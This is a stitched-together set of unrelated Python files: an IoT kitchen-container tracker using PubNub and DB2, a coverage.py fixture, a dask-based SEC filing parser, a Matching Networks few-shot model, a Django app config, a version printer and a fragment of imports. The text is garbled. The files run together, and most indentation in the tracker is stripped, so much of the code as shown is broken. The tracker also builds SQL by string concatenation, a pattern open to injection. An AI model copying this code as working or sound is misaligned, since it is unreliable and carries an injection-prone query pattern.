config_file = "./config.ini"
Config = ConfigParser.ConfigParser()
Config.read(config_file)
logging.basicConfig(filename='logger.log',level=logging.DEBUG)
#CONSTANTS
TIMESPAN_FOR_HISTORY = 7
REFILL_STATUS = 0
CONSUMPTION_STATUS = 1
#CONTAINER ID's
CONTAINER_1 = "001"
CONTAINER_2 = "002"
#DATA STRUCTURES
#KEY = ContainerID VALUE = Label, Expiry in Months, Critical Level, End Date
g_containerSettings = dict()
SETTINGS_LABEL = 0
SETTINGS_EXPIRY = 1
SETTINGS_CRITICAL_LEVEL = 2
SETTINGS_END_DATE = 3
#KEY = ContainerID VALUE = Present Weight, Previous Weight, Total Refill, Total Consumed, Start Date, Expiry Estimate, Start Time
g_containerStatus = dict()
STATUS_PRESENT_WEIGHT = 0
STATUS_PREVIOUS_WEIGHT = 1
STATUS_TOTAL_REFILL = 2
STATUS_TOTAL_CONSUMED = 3
STATUS_START_DATE = 4
EXPIRY_ESTIMATE = 5
STATUS_START_TIME = 6
#KEY = Label VALUE = Container ID, Present Weight, Critical Level, Expiry in Days, Status(Refill/Consumed)
g_containerMessage = dict()
EXPIRY_UPDATE = 3
#KEY = Container ID VALUE = Present DATE, Consumed Value
g_perdayConsumption = dict()
CONSUM_DATE = 0
CONSUM_QTY = 1
#KEY = Container ID VALUE = Present DATE, Refill Value
g_perdayRefill = dict()
REFILL_DATE = 0
REFILL_QTY = 1
'''****************************************************************************************
Function Name : ConfigSectionMap
Description : Parses the given section of the config file, extracts the options and returns them as a dict
Parameters : section - section to be parsed
****************************************************************************************'''
def ConfigSectionMap(section):
dict1 = {}
options = Config.options(section)
for option in options:
try:
dict1[option] = Config.get(section, option)
if dict1[option] == -1:
DebugPrint("skip: %s" % option)
except:
logging.debug("exception on %s!" % option)
dict1[option] = None
return dict1
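# Illustrative config.ini layout implied by the ConfigSectionMap lookups below
# (all values are placeholders, not real credentials):
#   [pubnub_init]
#   pub_key = <your-publish-key>
#   sub_key = <your-subscribe-key>
#   [database]
#   db_schema = <schema>
#   db_host = <host>
#   db_name = <database>
#   table_name = <table>
#   username = <user>
#   pwd = <password>
#   port = <port>
#   [expirySelector]
#   expiry = 0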
# Initialize the Pubnub Keys
PUB_KEY = ConfigSectionMap("pubnub_init")['pub_key']
SUB_KEY = ConfigSectionMap("pubnub_init")['sub_key']
#Database Related Variables and Lists
DB_SCHEMA = ConfigSectionMap("database")['db_schema']
DB_HOST = ConfigSectionMap("database")['db_host']
DB_NAME = ConfigSectionMap("database")['db_name']
DATABASE_TABLE_NAME = ConfigSectionMap("database")['table_name']
DB_USER_NAME = ConfigSectionMap("database")['username']
DB_PASSWORD = ConfigSectionMap("database")['pwd']
DB_PORT = ConfigSectionMap("database")['port']
#Expiry Selection
EXPIRY_SELECT = int(ConfigSectionMap("expirySelector")['expiry'])
'''****************************************************************************************
Function Name : init
Description : Initializes the pubnub keys and starts subscribing to the
kitchenDevice-resp and kitchenApp-req channels
Parameters : None
****************************************************************************************'''
def init():
#Pubnub Initialization
global pubnub
pubnub = Pubnub(publish_key=PUB_KEY,subscribe_key=SUB_KEY)
pubnub.subscribe(channels='kitchenDevice-resp', callback=callback, error=callback, reconnect=reconnect, disconnect=disconnect)
pubnub.subscribe(channels='kitchenApp-req', callback=appcallback, error=appcallback, reconnect=reconnect, disconnect=disconnect)
'''****************************************************************************************
Function Name : dB_init
Description : Initializes the database and establishes the connection between the
              database and the kitchen-tracker
Parameters : None
****************************************************************************************'''
def dB_init():
dbtry = 0
while (dbtry < 3):
try:
if 'VCAP_SERVICES' in os.environ:
hasVcap = True
import json
vcap_services = json.loads(os.environ['VCAP_SERVICES'])
if 'dashDB' in vcap_services:
hasdashDB = True
service = vcap_services['dashDB'][0]
credentials = service["credentials"]
url = 'DATABASE=%s;uid=%s;pwd=%s;hostname=%s;port=%s;' % ( credentials["db"],credentials["username"],credentials["password"],credentials["host"],credentials["port"])
else:
hasdashDB = False
else:
hasVcap = False
url = 'DATABASE=%s;uid=%s;pwd=%s;hostname=%s;port=%s;' % (DB_NAME,DB_USER_NAME,DB_PASSWORD,DB_HOST,DB_PORT)
connection = ibm_db.connect(url, '', '')
if (active(connection)):
return connection
except Exception as error:
logging.debug("dataBase connection_ERROR : " + str(error))
dbtry+=1
return None
'''****************************************************************************************
Function Name : defaultLoader
Description : Initializes the container status, registers the container with the app
              and updates the historical graph
Parameters : p_containerid - Respective Container ID
             p_expiryInMonths - Expiry period configured for the container
****************************************************************************************'''
def defaultLoader(p_containerid,p_expiryInMonths):
    #KEY = ContainerID VALUE = Present Weight, Previous Weight, Total Refill, Total Consumed, Start Date, Expiry Estimate, Start Time
    g_containerStatus.setdefault(p_containerid, [0.00, 0.00, 0.00, 0.00, 0, 0, 0])
#Inital Update for the APP for the Empty Container and Setting UP
pubnub.publish(channel="kitchenApp-resp", message={g_containerSettings[p_containerid][SETTINGS_LABEL]:[p_containerid,0.00,g_containerSettings[p_containerid][SETTINGS_CRITICAL_LEVEL],p_expiryInMonths,0],"warning":"!!Registration Success!!"})
g_containerMessage.setdefault(g_containerSettings[p_containerid][SETTINGS_LABEL],[p_containerid,0.00,g_containerSettings[p_containerid][SETTINGS_CRITICAL_LEVEL],p_expiryInMonths,0])
#Initial Query for the History and Graph
appHistoricalGraph(p_containerid,TIMESPAN_FOR_HISTORY)
#Loading the Default Values
g_perdayRefill.setdefault(p_containerid, [datetime.datetime.now().date(),0.00])
g_perdayConsumption.setdefault(p_containerid, [datetime.datetime.now().date(),0])
'''****************************************************************************************
Function Name : appSetting
Description : Handles the Request sent from an app and register the container settings
Parameters : p_requester - Request sent from APP
p_containerid - Respective Container ID
                       p_containerlabel - Register the container label for the ID
p_expiryInMonths - Register the expiry
p_criticallevel - Register the critical level of the container
****************************************************************************************'''
def appSetting(p_requester,p_containerid,p_containerlabel,p_expiryInMonths,p_criticallevel):
if(p_requester == "APP"):
# Container Label, Expiry in Months, Critical Level, End Date
if(not g_containerSettings.has_key(p_containerid) and not g_containerMessage.has_key(p_containerlabel)):
if EXPIRY_SELECT == 0:
g_containerSettings[p_containerid] = [p_containerlabel,p_expiryInMonths,p_criticallevel,(datetime.datetime.today() + relativedelta(months=p_expiryInMonths))]
else:
g_containerSettings[p_containerid] = [p_containerlabel,p_expiryInMonths,p_criticallevel,(datetime.datetime.now() + relativedelta(hours=p_expiryInMonths))]
defaultLoader(p_containerid,p_expiryInMonths)
else:
pubnub.publish(channel="kitchenApp-resp", message={"warning":"ID/Name is already registered"})
'''****************************************************************************************
Function Name : appReset
Description : Handles the Request sent from an app and reset the container settings
Parameters : p_requester - Request sent from APP
p_containerid - Respective Container ID
****************************************************************************************'''
def appReset(p_requester,p_containerid):
if(p_requester == "APP"):
if(g_containerSettings.has_key(p_containerid)):
del g_containerMessage[g_containerSettings[p_containerid][SETTINGS_LABEL]],g_containerSettings[p_containerid]
g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT] = 0
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = 0
else:
logging.warning("Container ID has not been registered")
'''****************************************************************************************
Function Name : updateCurrentStatus
Description : Updates the Refill/Consumed Data to the Database and the APP
Parameters : p_currentDate - Present date uploaded on DB
p_containerid - Container ID which should be updated
p_status - Refill / Consumed
p_weight - Current Weight to be uploaded to the database
****************************************************************************************'''
def updateCurrentStatus(p_currentDate,p_containerid,p_status,p_weight,p_statusWeight):
# Weight, Critical Level, Expiry in Days, Refill/Consumed
g_containerMessage[g_containerSettings[p_containerid][SETTINGS_LABEL]] = [p_containerid,p_weight,g_containerSettings[p_containerid][SETTINGS_CRITICAL_LEVEL],g_containerStatus[p_containerid][EXPIRY_ESTIMATE],p_status]
pubnub.publish(channel="kitchenApp-resp", message=g_containerMessage)
#Uploads the status data to the DB
if(p_status == REFILL_STATUS):
dataBaseUpload(p_currentDate,p_containerid,p_status,p_statusWeight)
logging.info("Data Uploaded on Refill")
else:
dataBaseUpload(p_currentDate,p_containerid,p_status,p_statusWeight)
logging.info("Data Uploaded on Consumption")
'''****************************************************************************************
Function Name : updateExpiry
Description : Updates the Expiry Date/Minutes
Parameters : p_containerid - Respective Container ID
p_status - Refill / Consumed
****************************************************************************************'''
def updateExpiry(p_containerid,p_status):
if g_containerSettings.has_key(p_containerid) and g_containerStatus[p_containerid][EXPIRY_ESTIMATE] >= 0:
g_containerStatus[p_containerid][STATUS_START_DATE] = datetime.datetime.today()
if p_status == 0:
if EXPIRY_SELECT == 0:
#End Date = Today date + Months
g_containerSettings[p_containerid][SETTINGS_END_DATE] = g_containerStatus[p_containerid][STATUS_START_DATE] + relativedelta(months=g_containerSettings[p_containerid][SETTINGS_EXPIRY])
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = g_containerSettings[p_containerid][SETTINGS_END_DATE] - g_containerStatus[p_containerid][STATUS_START_DATE]
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = g_containerStatus[p_containerid][EXPIRY_ESTIMATE].days
else:
#End Time = Today Time + Minutes
g_containerSettings[p_containerid][SETTINGS_END_DATE] = g_containerStatus[p_containerid][STATUS_START_DATE] + relativedelta(minutes=g_containerSettings[p_containerid][SETTINGS_EXPIRY])
                l_timeDifference = g_containerSettings[p_containerid][SETTINGS_END_DATE] - g_containerStatus[p_containerid][STATUS_START_DATE]
                g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = divmod(l_timeDifference.days * 86400 + l_timeDifference.seconds, 60)[0]
else:
if EXPIRY_SELECT == 0:
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = g_containerSettings[p_containerid][SETTINGS_END_DATE] - g_containerStatus[p_containerid][STATUS_START_DATE]
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = g_containerStatus[p_containerid][EXPIRY_ESTIMATE].days
else:
                l_timeDifference = g_containerSettings[p_containerid][SETTINGS_END_DATE] - g_containerStatus[p_containerid][STATUS_START_DATE]
                g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = divmod(l_timeDifference.days * 86400 + l_timeDifference.seconds, 60)[0]
#Updates the Expiry on Each App Refresh
g_containerMessage[g_containerSettings[p_containerid][SETTINGS_LABEL]][EXPIRY_UPDATE] = g_containerStatus[p_containerid][EXPIRY_ESTIMATE]
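# Worked example for the minutes-based branch above: a 2-hour expiry window is
# a timedelta of 0 days and 7200 seconds, so divmod(0*86400 + 7200, 60)[0]
# yields 120 minutes for EXPIRY_ESTIMATE.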
'''****************************************************************************************
Function Name : containerWeight
Description   : Once the device responds with the present weight, the server handles
                the data and evaluates whether the container was refilled or consumed
Parameters : p_containerid - Container ID which is updated
p_weight - Present Weight of the respective container
****************************************************************************************'''
def containerWeight(p_containerid,p_weight):
global DATABASE_TABLE_NAME
g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT] = p_weight
l_todayDate = datetime.datetime.now().date()
if(g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT] > g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT]):
if(g_perdayRefill[p_containerid][REFILL_DATE] != l_todayDate):
del g_perdayRefill[p_containerid]
g_perdayRefill.setdefault(p_containerid, [l_todayDate,0.00])
logging.info(p_containerid + " Item Refill")
# Calculate and Update the Per day Refill Value = Per Day Total Refill + current refill
g_perdayRefill[p_containerid][REFILL_QTY] = g_perdayRefill[p_containerid][REFILL_QTY] + (g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT] - g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT])
# Calculate and Update the Total Refill Value = Total refill + current refill
g_containerStatus[p_containerid][STATUS_TOTAL_REFILL] = g_containerStatus[p_containerid][STATUS_TOTAL_REFILL] + (g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT] - g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT])
g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT] = g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT]
if(g_containerSettings.has_key(p_containerid)):
# Calculates for expiry date in days
updateExpiry(p_containerid,REFILL_STATUS)
updateCurrentStatus(l_todayDate,p_containerid,REFILL_STATUS,p_weight,g_perdayRefill[p_containerid][REFILL_QTY])
else:
if(g_perdayConsumption[p_containerid][CONSUM_DATE] != l_todayDate):
del g_perdayConsumption[p_containerid]
g_perdayConsumption.setdefault(p_containerid, [l_todayDate,0])
logging.info(p_containerid + " Item Consumed")
# Calculate and Update the Per day Consumption Value = Consumption + current Consumption
g_perdayConsumption[p_containerid][CONSUM_QTY] = g_perdayConsumption[p_containerid][CONSUM_QTY] + (g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT] - g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT])
# Calculate and Update the Total Consumption Value = Consumption + current Consumption
g_containerStatus[p_containerid][STATUS_TOTAL_CONSUMED] = g_containerStatus[p_containerid][STATUS_TOTAL_CONSUMED] + (g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT] - g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT])
g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT] = g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT]
if(g_containerSettings.has_key(p_containerid)):
updateExpiry(p_containerid,CONSUMPTION_STATUS)
updateCurrentStatus(l_todayDate,p_containerid,CONSUMPTION_STATUS,p_weight,g_perdayConsumption[p_containerid][CONSUM_QTY])
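# Example flow (illustrative weights): with a previous reading of 120 and a new
# reading of 200, the 80-unit delta is accumulated into g_perdayRefill and uploaded
# with REFILL_STATUS; a later reading of 150 would instead log a 50-unit consumption.
# Per-day totals are reset via del/setdefault whenever the stored date is not today.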
'''****************************************************************************************
Function Name : dataBaseUpload
Description : Upload the Refill/Consumed Status and Quantity to the DB
Parameters : p_todayDate - Respective Date
p_containerid - Respective Container ID
p_status - Status of the Update : Refill/ consumed
0 - Refill
1 - Consumed
p_quantity - Present Quantity to be uploaded to DB
****************************************************************************************'''
def dataBaseUpload(p_todayDate,p_containerid,p_status,p_quantity):
global DATABASE_TABLE_NAME
    l_checkData_length = dict()
    l_db_statement = None
#Connecting to the database
l_connection = dB_init()
if(l_connection == None):
logging.error("Database Connection Failed on Database Upload")
return
#Current Time upload on the database
l_time = datetime.datetime.now().strftime('%H:%M:%S')
p_todayDate = p_todayDate.strftime('%Y-%m-%d')
    l_date_query = "SELECT COUNT(*) FROM "+DB_SCHEMA+"."+DATABASE_TABLE_NAME+" WHERE DATES = '"+str(p_todayDate)+"' AND STATUS = '"+str(p_status)+"' AND SCALE_ID = '"+p_containerid+"'"
try:
l_db_statement = ibm_db.exec_immediate(l_connection, l_date_query)
l_checkData_length = ibm_db.fetch_assoc(l_db_statement)
except Exception as e:
logging.error("dataBaseUpload_datequery_ERROR : " + str(e))
if(l_checkData_length.has_key('1') and (int(l_checkData_length['1'])) == 0):
        insert_data = "INSERT INTO "+DB_SCHEMA+"."+DATABASE_TABLE_NAME +" VALUES "+"('"+p_containerid+"','"+p_todayDate+"','"+str(l_time)+"','"+str(p_quantity)+"','"+str(p_status)+"')"
        try:
            l_db_statement = ibm_db.exec_immediate(l_connection, insert_data)
except Exception as e:
logging.error("dataBaseUpload_insertdata_ERROR : " + str(e))
else:
update_query = "UPDATE "+DB_SCHEMA+"."+DATABASE_TABLE_NAME +" SET TIME = '"+str(l_time)+"', QUANTITY = '"+str(p_quantity)+"' WHERE DATES='" + str(p_todayDate) +"' AND STATUS ='"+str(p_status)+"' AND SCALE_ID = '"+p_containerid+"'"
try:
l_db_statement = ibm_db.exec_immediate(l_connection, update_query)
except Exception as e:
logging.error("dataBaseUpload_updatequery_ERROR : " + str(e))
    #Closing the Database Connection
    if l_db_statement is not None:
        ibm_db.free_stmt(l_db_statement)
ibm_db.close(l_connection)
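# A parameterized variant of the statements above, sketched with ibm_db's
# prepare/execute (shown as comments only; placeholders avoid quoting mistakes and
# SQL injection, and the column layout is assumed from the UPDATE above):
#   l_stmt = ibm_db.prepare(l_connection, "UPDATE "+DB_SCHEMA+"."+DATABASE_TABLE_NAME+
#       " SET TIME = ?, QUANTITY = ? WHERE DATES = ? AND STATUS = ? AND SCALE_ID = ?")
#   ibm_db.execute(l_stmt, (l_time, str(p_quantity), p_todayDate, str(p_status), p_containerid))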
'''****************************************************************************************
Function Name : appHistoricalGraph
Description   : Requests the DB for the past history over the given time span and
                updates the data to the app
Parameters    : p_containerid - Respective container
                p_timeSpan - Time span over which to request data from the DB
****************************************************************************************'''
def appHistoricalGraph(p_containerid,p_timeSpan):
global DATABASE_TABLE_NAME
#Connecting to the database
l_connection = dB_init()
if(l_connection == None):
logging.error("Database Connection Failed on Database Query")
return
    #Evaluating the number of days to query the db
p_timeSpan = p_timeSpan - 1
l_refill_history = dict()
l_consumption_history = dict()
    l_temp_dict = dict()
    l_db_statement = None
l_sdat = datetime.datetime.now().date()
l_edat = l_sdat - datetime.timedelta(days=p_timeSpan)
l_sdate = l_sdat.strftime('%Y-%m-%d')
l_edate = l_edat.strftime('%Y-%m-%d')
#Parsing the data from the database and update the dictionary with respective time span
for i in range(p_timeSpan,-1,-1):
l_edat_loop = l_sdat - datetime.timedelta(days=i)
l_edate_loop = l_edat_loop.strftime('%Y-%m-%d')
l_refill_history[l_edate_loop] = [p_containerid,0,0,0]
l_consumption_history[l_edate_loop] = [p_containerid,0,0,0]
    l_twodate_query = "SELECT * FROM "+DB_SCHEMA+"."+DATABASE_TABLE_NAME +" WHERE DATES BETWEEN DATE(\'" + l_edate + "\') AND DATE(\'" + l_sdate + "\') AND SCALE_ID = '" + p_containerid + "'"
try:
l_db_statement = ibm_db.exec_immediate(l_connection, l_twodate_query)
l_temp_dict = ibm_db.fetch_assoc(l_db_statement)
except Exception as e:
logging.error("appHistoricalGraph_twodatequery exec/fetch_ERROR : " + str(e))
while l_temp_dict:
if(l_temp_dict["SCALE_ID"] == p_containerid):
l_date = l_temp_dict["DATES"].strftime('%Y-%m-%d')
if(l_temp_dict["STATUS"] == 0):
l_refill_history[l_date] = [l_temp_dict["SCALE_ID"],l_temp_dict["TIME"],"%.2f"%l_temp_dict["QUANTITY"],l_temp_dict["STATUS"]]
else:
l_consumption_history[l_date] = [l_temp_dict["SCALE_ID"],l_temp_dict["TIME"],"%.2f"%l_temp_dict["QUANTITY"],l_temp_dict["STATUS"]]
try:
l_temp_dict = ibm_db.fetch_assoc(l_db_statement)
except Exception as e:
logging.error("appHistoricalGraph_twodatequery fetch_ERROR : " + str(e))
pubnub.publish(channel="kitchenApp-refillHistory", message=l_refill_history)
pubnub.publish(channel="kitchenApp-consumptionHistory", message=l_consumption_history)
#deleting the history
del l_refill_history,l_consumption_history
    #Closing the Database Connection
    if l_db_statement is not None:
        ibm_db.free_stmt(l_db_statement)
ibm_db.close(l_connection)
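# Payload layout note: both history dicts published above map 'YYYY-MM-DD' date
# strings to [SCALE_ID, TIME, QUANTITY, STATUS], with [p_containerid, 0, 0, 0] as
# the filler for days that have no matching database row.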
'''****************************************************************************************
Function Name : appUpdate
Description   : Once the app is loaded, the app requests an update. On request, the
                server responds with the current status.
Parameters : p_requester - Request sent from APP
****************************************************************************************'''
def appUpdate(p_requester):
if p_requester == "APP":
#Initial Data to be updated with the app
if(len(g_containerSettings) > 0):
updateExpiry(CONTAINER_1,CONSUMPTION_STATUS)
updateExpiry(CONTAINER_2,CONSUMPTION_STATUS)
pubnub.publish(channel="kitchenApp-resp", message=g_containerMessage)
else:
logging.warning("Containers are not registered")
'''****************************************************************************************
Function Name : callback
Description : Waits for the message from the kitchenDevice-resp channel
Parameters : message - Sensor Status sent from the hardware
channel - channel for the callback
****************************************************************************************'''
def callback(message, channel):
if(message.has_key("containerID") and message.has_key("weight") and g_containerSettings.has_key(message["containerID"])):
containerWeight(message["containerID"],message["weight"])
else:
logging.warning("Invalid details received on Hardware response")
'''****************************************************************************************
Function Name : appcallback
Description : Waits for the Request sent from the APP
Parameters : message - Request sent from the app
channel - channel for the appcallback
****************************************************************************************'''
def appcallback(message, channel):
if(message.has_key("requester") and message.has_key("requestType")):
if(message["requestType"] == 0):
appSetting(message["requester"],message["containerID"],message["containerLabel"],message["expiryMonths"],message["criticalLevel"])
elif(message["requestType"] == 1):
appReset(message["requester"],message["containerID"])
elif(message["requestType"] == 2):
appHistoricalGraph(message["containerID"],message["timeSpan"])
elif(message["requestType"] == 3):
appUpdate(message["requester"])
else:
logging.warning("Invalid details received on APP Request")
'''****************************************************************************************
Function Name : error
Description : If error in the channel, prints the error
Parameters : message - error message
****************************************************************************************'''
def error(message):
logging.error("ERROR on Pubnub: " + str(message))
'''****************************************************************************************
Function Name : reconnect
Description : Responds if server connects with pubnub
Parameters : message
****************************************************************************************'''
def reconnect(message):
logging.info("RECONNECTED")
'''****************************************************************************************
Function Name : disconnect
Description : Responds if server disconnects from pubnub
Parameters : message
****************************************************************************************'''
def disconnect(message):
logging.info("DISCONNECTED")
if __name__ == '__main__':
#Initialize the Script
init()
#End of the Script
##*****************************************************************************************************##
|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt
# My egg file!
walrus = "Eggman"
says = "coo-coo cachoo"
|
import sec_parser
import preprocessor
import dask
import dask.dataframe as dd
import dask.multiprocessing
from dask.diagnostics import ProgressBar
import os
import re
import pandas as pd
from functools import partial
def get_html(file_path):
with open(file_path, 'r') as fh:
contents = fh.read()
html = re.search(r'<html>.+?</html>', contents, re.DOTALL | re.I)
if html:
return html.group()
else:
return False
def write_to_file(contents, file_path):
if not contents:
return
dir_path = '/'+'/'.join(file_path.split('/')[0:-1])
if not os.path.exists(dir_path):
os.makedirs(dir_path)
with open(file_path, 'w') as fh:
fh.write(contents)
return
def get_file_paths(dir_path, extension=None):
file_paths = []
for root, dirs, files in os.walk(dir_path):
for file in files:
if extension:
if file.endswith(extension):
file_paths.append(os.path.join(root, file))
else:
file_paths.append(os.path.join(root, file))
return file_paths
def execute_html_parse(html_file_path, parsed_dir_path, preprocess=True,
fuzzy_threshold=0.8, marked_html=False, max_num_missing_items=0):
if os.path.isfile(html_file_path):
with open(html_file_path, 'r') as fh:
contents = fh.read()
file_name = html_file_path.split('/')[-1]
parse_dict, marked_html_str = sec_parser.parse_items(contents, fuzzy_threshold=fuzzy_threshold, marked_html=marked_html,
max_num_missing_items=max_num_missing_items)
if parse_dict:
print('parsing completed successfully for file: ', file_name)
print()
if preprocess:
parse_dict = {label: preprocessor.preprocess_html(html_str) for label, html_str in parse_dict.items()}
print('pre-processing completed successfully for file: ', file_name)
for label, item_html in parse_dict.items():
new_file_name = file_name.replace('.htm', '_' + label + '.htm')
new_file_path = parsed_dir_path+file_name.replace('.htm','')+'/'+new_file_name
write_to_file(item_html, new_file_path)
new_file_name = file_name.replace('.htm', '_' + 'marked' + '.htm')
new_file_path = parsed_dir_path + file_name.replace('.htm', '') + '/' + new_file_name
write_to_file(marked_html_str, new_file_path)
return True
else:
print('parsing failed for file: ', file_name)
print()
return False
else:
return False
def execute_parallel(dfrow, preprocess=True, fuzzy_threshold=0.8, marked_html=False, max_num_missing_items=0):
file_path = dfrow['file_path']
print('processing file: ', file_path)
print()
try:
if file_path.endswith('.txt'):
html_file_path = dfrow['html_dir_path'] + file_path.split('/')[-1].replace('.txt', '.htm')
write_to_file(get_html(file_path), html_file_path)
file_path = html_file_path
execute_html_parse(file_path, dfrow['parsed_dir_path'],
preprocess=preprocess, fuzzy_threshold=fuzzy_threshold, marked_html=marked_html, max_num_missing_items=max_num_missing_items)
return True
    except Exception as e:
        print('something went wrong during processing of file: ', file_path, '-', e)
        print()
        return False
def apply_parallel(df, func, get=dask.multiprocessing.get, npartitions=7):
    ddf = dd.from_pandas(df, npartitions=npartitions, sort=False)
    with ProgressBar():
        return ddf.apply(func, meta=('result', object), axis=1).compute(get=get)
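# Note on `meta`: dask needs the output schema of the row-wise apply without
# computing it. execute_parallel returns one bool per row, so a Series meta such
# as ('result', object) matches; passing the input frame's columns would declare
# a DataFrame output and mismatch the actual result at compute time.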
def main():
root_project_path = '/Users/dimitryslavin/Dropbox/all_docs/Education/UM_PhD_Docs/phd_research/sec_firm_mapping_clean/'
file_dir_path = root_project_path+'data/10k_sample/raw_text_10k/'
html_dir_path = root_project_path+'data/10k_sample/data_html_test/'
parsed_dir_path = root_project_path+'data/10k_sample/data_parsed_test/'
results_file_path = root_project_path+'data/10k_sample/parse_results.csv'
file_paths = get_file_paths(html_dir_path, extension = '.htm')
combos = list(zip(file_paths, [html_dir_path]*len(file_paths), [parsed_dir_path]*len(file_paths)))
combos = pd.DataFrame.from_records(combos, columns=['file_path', 'html_dir_path', 'parsed_dir_path'])
combos['parse_result'] = apply_parallel(combos, partial(execute_parallel, max_num_missing_items = 0, marked_html = True), npartitions=6)
combos.to_csv(results_file_path, index=False)
if __name__ == '__main__':
    main()
|
"""
See original implementation at
https://github.com/facebookresearch/low-shot-shrink-hallucinate
"""
import torch
from torch import nn
from easyfsl.methods import AbstractMetaLearner
class MatchingNetworks(AbstractMetaLearner):
"""
Oriol Vinyals, Charles Blundell, Timothy Lillicrap, Koray Kavukcuoglu, and Daan Wierstra.
"Matching networks for one shot learning." (2016)
https://arxiv.org/pdf/1606.04080.pdf
    Matching networks extract feature vectors for both support and query images. Then they refine
    these features using the context of the whole support set, with LSTMs. Finally, they compute
    query labels using their cosine similarity to support images.
"""
def __init__(self, *args):
"""
Build Matching Networks by calling the constructor of AbstractMetaLearner.
Raises:
ValueError: if the backbone is not a feature extractor,
i.e. if its output for a given image is not a 1-dim tensor.
"""
super().__init__(*args)
if len(self.backbone_output_shape) != 1:
raise ValueError(
"Illegal backbone for Matching Networks. "
"Expected output for an image is a 1-dim tensor."
)
# The model outputs log-probabilities, so we use the negative log-likelihood loss
self.loss_function = nn.NLLLoss()
# These modules refine support and query feature vectors
# using information from the whole support set
self.support_features_encoder = nn.LSTM(
input_size=self.feature_dimension,
hidden_size=self.feature_dimension,
num_layers=1,
batch_first=True,
bidirectional=True,
)
self.query_features_encoding_cell = nn.LSTMCell(
self.feature_dimension * 2, self.feature_dimension
)
self.softmax = nn.Softmax(dim=1)
# Here we create the fields so that the model can store
# the computed information from one support set
self.contextualized_support_features = None
self.one_hot_support_labels = None
def process_support_set(
self,
support_images: torch.Tensor,
support_labels: torch.Tensor,
):
"""
Overrides process_support_set of AbstractMetaLearner.
Extract features from the support set with full context embedding.
Store contextualized feature vectors, as well as support labels in the one hot format.
Args:
support_images: images of the support set
support_labels: labels of support set images
"""
support_features = self.backbone(support_images)
self.contextualized_support_features = self.encode_support_features(
support_features
)
self.one_hot_support_labels = nn.functional.one_hot(support_labels).float()
def forward(self, query_images: torch.Tensor) -> torch.Tensor:
"""
Overrides method forward in AbstractMetaLearner.
Predict query labels based on their cosine similarity to support set features.
Classification scores are log-probabilities.
Args:
query_images: images of the query set
Returns:
a prediction of classification scores for query images
"""
# Refine query features using the context of the whole support set
contextualized_query_features = self.encode_query_features(
self.backbone(query_images)
)
# Compute the matrix of cosine similarities between all query images
# and normalized support images
# Following the original implementation, we don't normalize query features to keep
# "sharp" vectors after softmax (if normalized, all values tend to be the same)
similarity_matrix = self.softmax(
contextualized_query_features.mm(
nn.functional.normalize(self.contextualized_support_features).T
)
)
# Compute query log probabilities based on cosine similarity to support instances
# and support labels
log_probabilities = (
similarity_matrix.mm(self.one_hot_support_labels) + 1e-6
).log()
return log_probabilities
def encode_support_features(
self,
support_features: torch.Tensor,
) -> torch.Tensor:
"""
Refine support set features by putting them in the context of the whole support set,
using a bidirectional LSTM.
Args:
support_features: output of the backbone
Returns:
contextualised support features, with the same shape as input features
"""
# Since the LSTM is bidirectional, hidden_state is of the shape
# [number_of_support_images, 2 * feature_dimension]
hidden_state = self.support_features_encoder(support_features.unsqueeze(0))[
0
].squeeze(0)
# Following the paper, contextualized features are computed by adding original features, and
# hidden state of both directions of the bidirectional LSTM.
contextualized_support_features = (
support_features
+ hidden_state[:, : self.feature_dimension]
+ hidden_state[:, self.feature_dimension :]
)
return contextualized_support_features
def encode_query_features(self, query_features: torch.Tensor) -> torch.Tensor:
"""
Refine query set features by putting them in the context of the whole support set,
using attention over support set features.
Args:
query_features: output of the backbone
Returns:
contextualized query features, with the same shape as input features
"""
hidden_state = query_features
cell_state = torch.zeros_like(query_features)
# We do as many iterations through the LSTM cell as there are query instances
# Check out the paper for more details about this!
for _ in range(len(self.contextualized_support_features)):
attention = self.softmax(
hidden_state.mm(self.contextualized_support_features.T)
)
read_out = attention.mm(self.contextualized_support_features)
lstm_input = torch.cat((query_features, read_out), 1)
hidden_state, cell_state = self.query_features_encoding_cell(
lstm_input, (hidden_state, cell_state)
)
hidden_state = hidden_state + query_features
return hidden_state
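# Illustrative usage sketch (assumes a backbone whose output for a single image is
# a 1-dim feature vector, as enforced by the constructor check above):
#   model = MatchingNetworks(backbone)
#   model.process_support_set(support_images, support_labels)
#   log_probs = model(query_images)  # log-probabilities, one row per query image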
|
from django.apps import AppConfig
class WardConfig(AppConfig):
name = 'ward'
|
import imageio
import tqdm
import numpy
import scipy
import matplotlib
import keras
import tensorflow
print("imageio=={}".format(imageio.__version__))
print("tqdm=={}".format(tqdm.__version__))
print("numpy=={}".format(numpy.__version__))
print("scipy=={}".format(scipy.__version__))
print("matplotlib=={}".format(matplotlib.__version__))
print("keras=={}".format(keras.__version__))
print("tensorflow=={}".format(tensorflow.__version__))
|
from coco.contract.backends import GroupBackend
from coco.contract.errors import GroupBackendError, GroupNotFoundError
from coco.core.helpers import get_internal_ldap_connected
from coco.core.models import BackendGroup
from coco.core.signals.signals import backend_group_created, \
backend_group_deleted, backend_group_member_added, \
backend_group_member_removed, backend_group_modified
from django.dispatch import receiver
from django.db.models.signals import post_delete, post_save
